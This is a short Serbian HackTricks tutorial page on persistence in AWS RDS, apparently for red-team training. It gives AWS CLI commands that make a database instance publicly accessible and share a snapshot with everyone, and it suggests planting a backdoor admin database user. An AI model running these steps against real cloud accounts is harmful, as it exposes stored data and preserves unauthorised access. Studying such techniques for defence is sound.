AWS - RDS Persistence

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

RDS

Za više informacija pogledajte:

AWS - Relational Database (RDS) Enum

Učini instancu javno dostupnom: rds:ModifyDBInstance

Napadač sa ovlašćenjem može modifikovati postojeću RDS instancu kako bi omogućio javnu dostupnost.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Napravite admin korisnika unutar baze podataka

Napadač bi mogao jednostavno napraviti korisnika unutar baze podataka tako da čak i ako je lozinka glavnog korisnika promenjena, on ne izgubi pristup bazi podataka.

Učinite snimak javnim

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Last updated